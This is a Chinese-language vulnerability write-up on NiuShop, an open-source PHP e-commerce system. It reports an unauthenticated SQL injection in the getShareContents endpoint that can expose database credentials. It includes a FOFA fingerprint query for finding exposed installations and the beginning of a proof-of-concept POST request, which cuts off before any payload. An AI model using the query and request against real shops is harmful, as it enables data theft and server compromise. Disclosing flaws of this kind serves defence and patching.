0x01 产品简介
Niushop商城系统,是由山西牛酷信息科技有限公司完全自主设计、研发的一套PHP的开源电商系统。Niushop商城系统为团队十年电商开发经验汇集巨献!是全国首创集 "B2B2C多用户商城 + 微信微分销 + 电商平台招商运营 + iOS 、Android多平台客户端" 的PHP开源电商系统。Niushop采用ThinkPHP5 + MySQL 开发语言,完全面向对象的技术架构设计开发。公司团队在开发工作中始终保持 专业、专注、专一的原则。旨在为用户提供最好的全功能型电商软件产品。
0x02 漏洞概述
NiuShop开源商城系统 getShareContents接口处存在SQL注入漏洞,未授权的攻击者可以利用此漏洞获取数据库敏感信息及凭证,进一步利用可获取服务器权限。
0x03 复现环境
FOFA:
body="niushop_url_model" && body="niushop_rewrite_model"
0x04 漏洞复现
PoC
POST /index.php?s=/wap/goods/getShareContents/// HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-T
